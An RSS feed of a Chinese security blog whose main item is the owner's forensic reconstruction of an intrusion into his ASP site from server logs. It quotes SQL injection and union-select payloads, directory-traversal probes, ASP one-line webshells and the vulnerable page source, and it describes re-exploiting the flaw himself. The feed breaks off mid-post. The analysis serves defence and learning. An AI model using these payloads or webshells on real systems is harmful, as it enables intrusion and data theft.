<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[金刀客博客]]></title>
<link>http://www.daokers.com/</link>
<description><![CDATA[攻防无绝对, 技术无黑白]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2009 PJBlog3 v3.0.6.170]]></copyright>
<webMaster><![CDATA[daokers@qq.com(金刀客)]]></webMaster>
<generator>PJBlog3 v3.0.6.170</generator> 
<image>
	<title>金刀客博客</title>
	<url>http://www.daokers.com/images/logos.gif</url>
	<link>http://www.daokers.com/</link>
	<description>金刀客博客</description>
</image>

			<item>
			<link>http://www.daokers.com/article/others/634.htm</link>
			<title><![CDATA[祝兄弟们2012新年快乐]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[乱七八糟]]></category>
			<pubDate>Sun,22 Jan 2012 16:41:17 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=634</guid>
		<description><![CDATA[<span style="font-family:黑体"><span style="color:Red"><span style="font-size:20pt;line-height:100%;">&nbsp;&nbsp;&nbsp;&nbsp;祝愿所有的兄弟们新年快乐，平平安安的，快快乐乐的度过2012年！<br/><br/>&nbsp;&nbsp;&nbsp;&nbsp;看到很多朋友要求加群，我公布一个，欢迎大家来吹水！QQ群:182314207<br/><br/>daokers<br/><br/><br/></span></span></span>]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/collection/633.htm</link>
			<title><![CDATA[VB DLL Injector v1.0]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[精品收藏]]></category>
			<pubDate>Sun,04 Dec 2011 19:26:15 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=633</guid>
		<description><![CDATA[<br/><br/>这段时间玩dll，扫到个vb的dll injector，发来和童鞋们共享，有时间可以改进改进。<br/><br/><a href="http://www.daokers.com/attachments/month_1112/y2011124192559.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1112/y2011124192559.gif" border="0" alt="点击放大图片"/></a><br/><br/>发来源代码共享之，<br/><br/><img src="http://www.daokers.com/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.daokers.com/showfile.asp?down=attachments/month_1112/g201112419267.rar" target="_blank">点击下载此文件</a><script src="daoge_getDLinfo.asp?f=showfile.asp?down=attachments/month_1112/g201112419267.rar" type="text/javascript"></script><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/others/632.htm</link>
			<title><![CDATA[vb IDE  0x11003900错误]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[乱七八糟]]></category>
			<pubDate>Wed,02 Nov 2011 11:12:26 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=632</guid>
		<description><![CDATA[最近这个vb IDE总是0x11003900错误，弄得我很郁闷，今天好好找了下原因。<br/><br/><a href="http://www.daokers.com/attachments/month_1111/b2011112111119.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1111/b2011112111119.gif" border="0" alt="点击放大图片"/></a><br/><br/>原来是amicforvb和IDE响应鼠标插件冲突导致，amicforvb本来就有响应鼠标滚动的功能，我再添加一个相同功能插件，不打架才怪！！<br/><br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/others/631.htm</link>
			<title><![CDATA[今天在天空软件园遇到一个带sethc后门的软件]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[乱七八糟]]></category>
			<pubDate>Sun,16 Oct 2011 01:46:35 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=631</guid>
		<description><![CDATA[今天想制作个自己用的皮肤，要打开ssf文件，于是去下一个7-zip，百度一搜，天空软件园多半都是排列的很前的。地址是<a href="http://www.skycn.com/soft/3404.html" target="_blank" rel="external">http://www.skycn.com/soft/3404.html</a>，7-Zip 9.21 多语言版。<br/><br/>下载下来安装，就觉得奇怪，运行什么taskkill.exe /im FreeHostKillexe.exe /f，一会更奇怪了，修改系统的ifso的值了，再过一会，系统文件保护提示系统文件被替换了，nnd，真是个后门。<br/><br/><a href="http://www.daokers.com/attachments/month_1110/12011101614323.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/12011101614323.gif" border="0" alt="点击放大图片"/></a><br/><br/>劫持sethc，自己改名sothc.exe，放在system32。<br/><br/>看下天空的下载情况<br/><br/><a href="http://www.daokers.com/attachments/month_1110/i2011101614510.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/i2011101614510.gif" border="0" alt="点击放大图片"/></a><br/><br/>顶得人还不少。<br/><br/>幸好，是个sethc后门，如果是个木马病毒，那就惨罗。如果搞个发信，那服务器应当也是潮水般的涌来？<br/><br/><br/><br/><br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.daokers.com/article/original/630.htm</link>
			<title><![CDATA[根据日志逆向分析攻击者入侵思路及查找0day]]></title>
			<author>daokers@qq.com(admin)</author>
			<category><![CDATA[原创天空]]></category>
			<pubDate>Tue,11 Oct 2011 20:44:58 +0800</pubDate>
			<guid>http://www.daokers.com/default.asp?id=630</guid>
		<description><![CDATA[分析感悟：能够在系统权限下做好的事情就尽量在系统搞定，实在不行的，再从其它防御方案来解决。<br/>详细过程：<br/>攻击者对我服务器的4个网站进行了大量的检测，最后决定把目标选为www.target.org。之后开始寻找注入点，时间大约是从2010-06-06 17:01:13左右开始，先后测试了这些带有参数的网址<br/>dc/toupiao.asp B1=投票&amp;B2=结果&#39; and &#39;7&#39;=&#39;7<br/>XXLR1.ASP?ID=560 and 7=2<br/>FLMEN.ASP MENUID=2265 and 7=7<br/>flmen.asp menuid=2265&amp;menujb=2 and 7=2<br/>flmen.asp menuid=2265&amp;menujb=2&#39; and &#39;7&#39;=&#39;7<br/>find.asp LR=!S!WCRTESTINPUT000000!E!&amp;B1=提交&amp;MENU=全部栏目&#39; and &#39;7&#39;=&#39;7<br/>find.asp B1=提交&amp;MENU=全部栏目&amp;LR=!S!WCRTESTINPUT000000!E!&#39; and &#39;7&#39;=&#39;7<br/>dc/toupiao.asp B1=投票&amp;B2=结果&#39; and &#39;7&#39;=&#39;2<br/>/flmen.asp menuid=2265 and 7=7<br/>ztlm.asp lb=南岭风光&#39; and &#39;7&#39;=&#39;2<br/>find.asp B1=提交&amp;MENU=全部栏目&amp;LR=!S!WCRTESTINPUT000000!E!&#39; and &#39;7&#39;=&#39;2<br/>find.asp LR=!S!WCRTESTINPUT000000!E!&amp;B1=提交&amp;MENU=99999999 o&#114; 7=7<br/>这里有一个测试方法，攻击者很聪明，他使用非数字来测试id值<br/><a href="http://www.target.org/xxlrimg.asp?tab=" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/xxlrimg.asp?tab=</a>&amp;menuid=2a283<br/>结果出现问题<br/><a href="http://www.daokers.com/attachments/month_1110/820111011201529.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/820111011201529.gif" border="0" alt="点击放大图片"/></a><br/><br/>之后进一步用逗号来测试<br/><a href="http://www.target.org//xxlrimg.asp" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>//xxlrimg.asp</a> tab=&amp;menuid=2283&#39;<br/>这次被网站系统过滤掉了<br/><br/><a href="http://www.daokers.com/attachments/month_1110/s20111011201551.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/s20111011201551.gif" border="0" alt="点击放大图片"/></a><br/><br/>跳转到首页<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a> /index.asp LR=/xxlrimg.asp在参数menuid中有非法URL2283’<br/>继续追寻注入点，同样用非数字测试id<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/XXLR1.ASP?ID=8a3<br/><br/><a href="http://www.daokers.com/attachments/month_1110/020111011201612.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/020111011201612.gif" border="0" alt="点击放大图片"/></a><br/><br/>已经看到注入的希望，但是这次吸取教训，不再以逗号测试。<br/><br/>接下来，他找到了这个网站的资料下载栏目，<a href="http://www.target.org//manger/Login.asp" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a>//manger/Login.asp</a>，直接给我爆出错误<br/>攻击者是这样测试的，将用户名用特殊字符测试，比如_&#39;123123&#39;&#39;<br/><br/><a href="http://www.daokers.com/attachments/month_1110/r20111011201634.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/r20111011201634.gif" border="0" alt="点击放大图片"/></a><br/><br/>直接爆80040e14错误<br/><a href="http://www.daokers.com/attachments/month_1110/620111011201648.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/620111011201648.gif" border="0" alt="点击放大图片"/></a><br/><br/>攻击者继续转换目标<br/>/system/user/userlogin.asp<br/>/system/user/login.asp<br/>/system/user/login1.asp<br/>但是之后继续来到资料下载这里测试<br/>这次把用户名换成了_&#39;admin&#39;&#39;，同时进行了union测试，句法如下<br/>_&#39;UserName_=_&#39;&#39;_and_exists_(sel&#101;ct_username_from_[admin])&#39;&#39;_<br/>就是在用户名中直接插sql语句。<br/>之后来了一次get测试<br/>/manger/Login.asp UserName=123&#39;&amp;PassWord=123&amp;GetCode=0568&amp;Submit.x=0&amp;Submit.y=0<br/>突然出现大量的对/manger/Login.asp的访问，不知道是不是暴力猜解<br/><br/><a href="http://www.daokers.com/attachments/month_1110/n2011101120175.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/n2011101120175.gif" border="0" alt="点击放大图片"/></a><br/><br/>与此同时另外一个日志出现，范围内容为<br/>/ever.asp lr=%C4%FA%C3%BB%D3%D0%D7%A2%B2%E1%B3%C9%B1%BE%D5%BE%D3%C3%BB%A7,%BB%F2%C3%BB%D3%D0%B5%C7%C2%BC,%B2%BB%C4%DC%CA%B9%D3%C3%B4%CB%B9%A6%C4%DC<br/>解密下<br/>ever.asp？lr=您没有注册成本站用户,或没有登录,不能使用此功能<br/><br/>但是我们继续关注114.237.161.118的行为<br/>仍然在变换sql语句猜解中<br/>_&#39;UserName_=_&#39;&#39;_and_exists_(sel&#101;ct_username_from_[admin])_wh&#101;re_&#39;&#39;=&#39;&#39;&#39;_<br/>&#39;UserName_=_&#39;123_and_exists_(sel&#101;ct_username_from_[admin])_wh&#101;re_&#39;&#39;=&#39;&#39;&#39;_<br/>_&#39;UserName_=_&#39;123&#39;_and_exists_(sel&#101;ct_username_from_[admin])_wh&#101;re_&#39;&#39;=&#39;&#39;_<br/>_&#39;UserName_=_&#39;123&#39;_and_exists_(sel&#101;ct_username_from_[admin])_wh&#101;re_&#39;1&#39;=&#39;1&#39;&#39;_<br/>_&#39;UserName_=_&#39;123&#39;_and_exists_(sel&#101;ct_username_from_[admin])_wh&#101;re_&#39;1&#39;=&#39;1&#39;&#39;&#39;_<br/>_&#39;UserName_=_&#39;123&#39;_and_exists_(sel&#101;ct_username_from_[admin])&#39;&#39;_<br/>多次无果之后继续回到登陆目录<br/>/system/user/userlogin.asp<br/>测试2次之后，开始放弃手工。开始收到大量的扫描日志。<br/>从日志看，如果没有猜错的话，应当是WWWSCAN。并且将目标定为system目录。<br/>在大量的扫描日志中，同时夹杂着攻击者手动游览的日志，非常让人郁闷。但是我找到了一些让人很是蛋疼的地址。<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/system/sysupfile/up2.asp<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/system/sel&#101;ctimg.asp?lb=&amp;id=&amp;dateid=6022999.99978859?id=541<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a> /system/sel&#101;ctimg1.asp<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a> /system/sysupfile/dispfile.asp fitype=3&amp;pagesn=&amp;fiex=&amp;upuser=<br/>这些日志应当不是扫描器的结果，那么有可能是攻击者下载了相同系统的源码，来测试。<br/>后面这个地址让人郁闷，竟然可以直接列出目录中的图片，没有任何权限检测。<br/><br/><a href="http://www.daokers.com/attachments/month_1110/220111011201735.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/220111011201735.gif" border="0" alt="点击放大图片"/></a><br/>真是mjj的网站系统，<br/>心想这个游览也就是看看图片罢了，但是慢慢的开始担心起来。我看到了试图跨目录的尝试，他是这样尝试的<br/>/system/sysupfile/dispfile.asp?fitype=3&amp;pagesn=1&amp;fiex=../&amp;upuser=<br/>/system/sysupfile/dispfile.asp fitype=3&amp;pagesn=1&amp;fiex=../..&amp;upuser=<br/>/system/sysupfile/dispfile.asp fitype=3&amp;pagesn=1&amp;fiex=/..&amp;upuser=<br/>/system/sysupfile/dispfile.asp fitype=3&amp;pagesn=1&amp;fiex=/../&amp;upuser=<br/>/data_file.asp?webid=&amp;id=&amp;dateid=6345000.00025146<br/>但是似乎并没有什么发现。开始转移到其它页面,突然发现，一个ins&#101;rtimg日志<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/system/ins&#101;rtimg.asp?dateid=6345000.00025146?id=545<br/>打开看了一下，蛋疼的很<br/><br/><a href="http://www.daokers.com/attachments/month_1110/52011101120184.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/52011101120184.gif" border="0" alt="点击放大图片"/></a><br/><br/>又是没权限检测的。继续往下看，找到了上传地址<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/system/sysupfile/up1.asp<br/>这个好像有session检查，攻击者进行了注入尝试<br/>/system/ins&#101;rtimg.asp dateid=6345000.00025146?id=545&#39;<br/>他同时找到了另外一个上传点<br/>/system/sysupfile/up2.asp<br/>但是似乎都没有利用的地方，他重新杀回登陆页面。找到多个重要的路径。<br/>/system/user/login1.asp<br/>/SYSTEM/USER/FRIEND.ASP<br/><br/><a href="http://www.daokers.com/attachments/month_1110/920111011201849.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/920111011201849.gif" border="0" alt="点击放大图片"/></a><br/>爆出了一个很重要的目录setup，此时已经差不多到了17:47:02，尝试进行了47分钟左右。<br/>/db/fileupimg2.asp<br/>/db/WEBDEL.ASP<br/>/system/upimg5<br/>/system/webfilelist.ASP?MENUID=2292&amp;menujb=3 文章管理页面<br/><br/>接下来，攻击者找到这样一个页面<br/>/dc/setup.asp<br/>/dc/setup1.asp&nbsp;&nbsp;<br/>爆出没有权限<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/dc/modi.asp<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/dc/modi.asp?id=1<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/dc/modi1.asp<br/><br/>继续往下翻，终于我看到了“/system/管理信息”之类的中文信息的路径，我知道，扫描日志终于要完了。<br/>攻击者还在查找注入<br/>/dc/modi.asp id=1&#39;<br/>/dc1/modi.asp?id=1&#39;<br/>/dc1/modi1.asp<br/>从日志看，攻击者又回到了图库这里<br/>/system/sel&#101;ctimg.asp?lb=&amp;id=&amp;dateid=6022999.99978859?id=541<br/>/system/sel&#101;ctimg1.asp?filetype=<br/>/system/data.asp?id=1<br/>/system/sysupfile/dispfile.asp?fitype=<br/>/system/ADDfile1.asp<br/>接下来出现<br/>/dc/webdc.asp写入文件失败的情况<br/>/upfile/dark2.asp<br/>此时说明，小马已经上来了。<br/>进行了多次的id的尝试<br/>/dc/modi.asp?id=39<br/>/dc/webdc.asp?goaction=qbh<br/>我有一种疑惑，是他传上来了shell？还是想测试这个是不是马？从格式看，可能是darkblood的。 <br/>还在继续猜测<br/>/system/webedit.asp?id=1<br/>/system/webedit.asp id=1&#39;<br/>看了只是想试试webdc是不是shell<br/>/system/webedit.asp?id=123<br/>/system/webedit.asp?id=123a<br/>/system/webedit.asp id=123&#39;<br/>/system/webedit1.asp id=123a<br/>/system/file_laiyuan1.asp<br/><br/>经过无数次尝试之后又回到了开始上传的那里<br/>/system/sysupfile/up1.asp<br/>/system/sysupfile/up2.asp<br/>擦，竟然知道数据库的绝对路径，蛋疼，越来越看不懂了<br/>之后确定用<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external">http://www.target.org</a></a></a>/dc1/modi.asp?id=1<br/>这个注入点才进行操作,试图读取文件和列目录<br/>/dc1/modi.asp%20id=1%20union%20sel&#101;ct%20username,password,3,4%20from%20admin%20in%20%22*://wwwroot/systemdb/%23%23%23%23userdb.asp%22%20wh&#101;re%20id=1<br/><br/>继续看日志，看到另外一个让我无语的地址<br/>/system/user/bbssetup.asp<br/><br/><a href="http://www.daokers.com/attachments/month_1110/v20111011201916.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/v20111011201916.gif" border="0" alt="点击放大图片"/></a><br/><br/>攻击者针对这个地址进行了大量的测试，之后开始转移到/guestbook这个目录来进行测试<br/>/guestbook/search.asp<br/>/guestbook/login.asp<br/><br/>再之后，让我迷惑不解，<br/>出现了a.asp的访问<br/>我打开一看，竟然是我的那个上传小马，还有另外一个上传小马/shellcode.asp;jpg<br/>让我更加迷惑的时这个文件似乎不是114.237.129.237上传的，因为他尝试了好多次的密码<br/>/shellcode.asp;jpg?goaction=123<br/>/shellcode.asp;jpg?action=123<br/>/shellcode.asp;jpg?action=123<br/>/shellcode.asp;jpg?g=1234<br/>/shellcode.asp;jpg?s=123<br/>/shellcode.asp;jpg?a=123<br/>/shellcode.asp;jpg?pass=123<br/>后来查看文件日期和自己的博客日志，猛然想起来，这几个shell极可能是自己当初测试时上传没有删除，查看了其中一个shell的密码，竟然是自己曾经用过的密码md5，蛋疼。让我迷惑的事情来了，114.237.129.237是怎么知道这个文件，他可以列出当前网站的目录？ca<br/>Systemdb/dark2.asp是确确实实存在的，这个肯定不是我上传，攻击者应当拿到了一句话后门。<br/>并且他试图列出c:\windows和E盘中的文件，至少修改了2个文件，分别为<br/>Systemdb/dark2.asp和dc/webdc.asp，Systemdb是数据库目录，具有写入的权限，但是无脚本权限，所以这个大马应当是没有作用。dc/webdc.asp是一个access数据库，能够写入，也有权限，但是这个目录是没有写入权限的，奇怪的是现在这个webdc.asp用记事本打开竟然全部为空，被清空了。现在攻击者的权限应当是拿到了一句话，并且可以列目录。并且，如果我没有猜错的话，他的一句话地址就是dc/webdc.asp。拿到一句话之后曾经想写入文件dc\wsi.asp。同时结合拦截日志，我知道是通过dc/modi1.asp写入，我查看dc/modi1.asp的源文件，他包含的有一个filetou.asp，而这个文件就是打开access数据库webdc.asp的文件。基于这个想法，我继续查看日志。我搜索dc/modi1.asp的相关访问记录，果然发现了踪迹<br/>“/dc/webdc.asp |69|800a000d|类型不匹配:_&#39;execute&#39;”.mjj的，已经被写入一句话了，查看周边记录。<br/>到现在我明白过来了，我说怎么有那么多的dc/modi.asp，dc/modi1.asp和dc/webdc.asp的访问记录呢。同时我突然想起来，上次小k弄这个站的时候是社工到了后台密码，好像也是在这个目录拿的shell。既然是这样的话，那么应当存在一个没有管理员验证就可以对数据库进行操作的页面。<br/>查看/dc/modi1.asp的源码<br/>&lt;%@ LANGUAGE = VBScript.Encode %&gt;<br/>&lt;!--#include file=&#34;superno.asp&#34;--&gt;<br/>&lt;!--#include file=&#34;filetou.asp&#34;--&gt;<br/>&lt;%<br/>id=session(&#34;webdcid&#34;)<br/>name=request.form(&#34;name&#34;)<br/>sql=&#34;Sel&#101;ct *&nbsp;&nbsp;FROM dc&nbsp;&nbsp;wh&#101;re id=&#34;&amp;id<br/>set rs=server.cr&#101;ateobject(&#34;ADODB.Recordset&#34;)<br/>rs.Open sql,conn, 1, 3<br/>rs(&#34;name&#34;)=name<br/>rs.up&#100;ate<br/>rs.close<br/>set conn=nothing<br/>session(&#34;webdcid&#34;)=&#34;&#34;<br/>response.redirect&nbsp;&nbsp;&#34;setup.asp&#34;<br/>%&gt;<br/>看到rs.up&#100;ate，不得不说蛋疼，有一点确信当初的想法了。心想这个name该怎么输入值呢？<br/><br/>由于也有大量的dc/modi.asp的访问记录，我查看了下dc/modi.asp的代码<br/>&lt;!--#include file=&#34;superno.asp&#34;--&gt;<br/>&lt;!--#include file=&#34;filetou.asp&#34;--&gt;<br/>&lt;%<br/>id=request(&#34;id&#34;)<br/>dim rs<br/>sql=&#34;Sel&#101;ct *&nbsp;&nbsp;FROM dc&nbsp;&nbsp;wh&#101;re id=&#34;&amp;id <br/>set rs=server.cr&#101;ateobject(&#34;ADODB.Recordset&#34;)<br/>rs.Open sql,conn, 1, 3<br/>session(&#34;webdcid&#34;)=id<br/>%&gt;<br/>&lt;html&gt;<br/>&lt;head&gt;<br/>&lt;meta http-equiv=&#34;Content-Language&#34; content=&#34;zh-cn&#34;&gt;<br/>&lt;meta http-equiv=&#34;Content-Type&#34; content=&#34;text/html; charset=gb2312&#34;&gt;<br/>&lt;meta name=&#34;GENERATOR&#34; content=&#34;Microsoft FrontPage 4.0&#34;&gt;<br/>&lt;meta name=&#34;ProgId&#34; content=&#34;FrontPage.Editor.Document&#34;&gt;<br/>&lt;title&gt;New Page 1&lt;/title&gt;<br/>&lt;/head&gt;<br/>&lt;body bgcolor=&#34;#E0F0F8&#34;&gt;<br/>&lt;form method=&#34;POST&#34; action=&#34;modi1.asp&#34;&gt;<br/>&nbsp;&nbsp;&lt;div align=&#34;center&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;center&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;table border=&#34;1&#34; width=&#34;70%&#34; bordercolorlight=&#34;#000000&#34; cellspacing=&#34;0&#34; cellpadding=&#34;10&#34; bordercolordark=&#34;#FFFFFF&#34; bgcolor=&#34;#A4D1E8&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;tr&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;td width=&#34;100%&#34;&gt;你要把项目：&lt;%=rs(&#34;name&#34;)%&gt;    &lt;br&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;改为：&lt;input type=&#34;text&#34; name=&#34;name&#34; size=&#34;20&#34; value=&#34;&lt;%=rs(&#34;name&#34;)%&gt;&#34;&gt;&lt;input type=&#34;submit&#34; value=&#34;提交&#34; name=&#34;B1&#34;&gt;&lt;/td&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/tr&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/table&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/center&gt;<br/>&nbsp;&nbsp;&lt;/div&gt;<br/>&lt;/form&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/>&lt;%rs.close<br/>set conn=nothing<br/>%&gt;<br/>一切都明白了，他的action对象就是modi1.asp，从过这个页面的form将一句话木马写入到数据库中。<br/>既然这样，那么我也测试一下<br/>由于是access数据库，并且没有拦截，所以我想应当是UNICODE码的加密一句话，由于数据库被搞坏，我重新传一个测试下。在这里得说一下，检测没问题，但是别毁坏别人的数据库。<br/>传好数据库后，我们打开<a href="http://www.target.org/dc/modi.asp?id=43" target="_blank" rel="external">http://www.target.org/dc/modi.asp?id=43</a><br/><br/><a href="http://www.daokers.com/attachments/month_1110/c20111011201949.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/c20111011201949.gif" border="0" alt="点击放大图片"/></a><br/><br/>插入加密的一句话。之后打开数据库查看是否成功。<br/><a href="http://www.daokers.com/attachments/month_1110/a2011101120203.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/a2011101120203.gif" border="0" alt="点击放大图片"/></a><br/><br/>已经被成功插入了一句话，<br/>用菜刀连接下看看<br/><br/><a href="http://www.daokers.com/attachments/month_1110/020111011202020.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/020111011202020.gif" border="0" alt="点击放大图片"/></a><br/><br/>成功列出了目录。说明入侵的思路确实是这样！问题找到了，那么思路也就清晰了。继续分析日志<br/>攻击者总共插入数据库2次。<br/>2010-06-06 18:16:55 222.73.167.44 GET /dc/webdc.asp.这条日志就是第一次检查是否插入成功的日志，由于第一次数据库没有损坏，/dc/modi.asp?id=1直接就能访问了，之后想写入大马，由于没有权限出现多次写入文件失败日志“/dc/webdc.asp |0|800a0bbc|写入文件失败。” 再到后来，开始列目录，查找可以上传文件的地方，最后在数据库目录/systemdb/写下dark2.asp，并尝试/systemdb/dark2.asp?goaction=qbh这样登陆，没有权限，清空内容，替换为test。这也就是这个文件的由来。之后上传了/upfile/dark2.asp，但是没有脚本权限，删除之。<br/>&nbsp;&nbsp; 在第一次插入数据库成功后，就尝试建立dc\wsi.asp，但是没有成功，之后尝试列出c：\windows和c:\windows\system32，但是都没有成功。同时尝试列出了e潘，e盘是cd，我无设置权限。<br/>之后不知道为什么，可能插入数据库出现了错误，同时数据库被插坏了。/dc/modi.asp?id=1已经不能正常访问，如是出现了下图的情况，多次尝试试图找出正确的id值。<br/><br/><a href="http://www.daokers.com/attachments/month_1110/w20111011202042.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/w20111011202042.gif" border="0" alt="点击放大图片"/></a><br/><br/>我说奇怪呢，怎么老是测试这个id，原来是为了找到一个正确的id值，然后插入一句话。不得不说，攻击者对这代码还真熟悉，我都从来没看过。从日志可以看到当id为43时，终于正确了。插入成功后用菜刀进行了连接，之后他想把这个webdc.asp替换成大马。由于找不到写入的目录，而写入的目录又没有权限，所以他不得不想办法把数据库webdc.asp替换成大马。他多次尝试这样登陆<br/>/dc/webdc.asp?goaction=qbh<br/>/dc/webdc.asp?goaction=login<br/>再之后他重新开始寻找其他漏洞，继续测试了大量注入点和后台文件。再到后面，还是来到了/dc1/modi.asp这里，让我郁闷的是，他竟然猜表<br/><br/><a href="http://www.daokers.com/attachments/month_1110/e2011101120216.gif" rel="lightbox[roadtrip]" title="醉里挑灯看剑 梦回吹角连营"><img src="http://www.daokers.com/attachments/month_1110/e2011101120216.gif" border="0" alt="点击放大图片"/></a><br/><br/>就这样一直在折腾，寻找敏感文件，尝试传大马的机会。<br/>一直到2010-06-06 20:10:42左右，最后确认了一次dc/webdc.asp没问题。如果没有猜错的话，攻击者应当吃晚饭去了。<br/>分享到这里的时候，我查看另一份拦截日志，发现这个时间怎么都对不上。仔细查看我才明白，iis的时间我没有设置为系统时间，而是格林尼治标准时间，也就是说比北京时间慢了8个小时。这样看了原来攻击者是从2010-06-06 17:01:13加上8个小时，那么就应当是6月7日的1点多开始的了，当然最后也不是晚饭了，应当是睡觉去了，这也才符合夜猫子的行动习惯。<br/>&nbsp;&nbsp;&nbsp;&nbsp; 那么结合我的另外一份日志，可以清晰的看到。攻击者在插入数据库时测试了这么几种一句话<br/> &lt;% eval request ( ) %&gt; <br/>&lt; script language = vbscript runat = server &gt; execute request ( ) &lt; /script &gt; <br/>&lt;% execute request ( ) %&gt; <br/>这些都被拦截了，那么他测试成功的一句话是什么呢？肯定是加密的ASCII一句话。<br/>在2010-06-07 02:51:55左右，攻击者开始重新开始测试，他尝试了几次union，这也导致他不得不更换ip。<br/><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" rel="external"><a href="http://www.target.org" target="_blank" 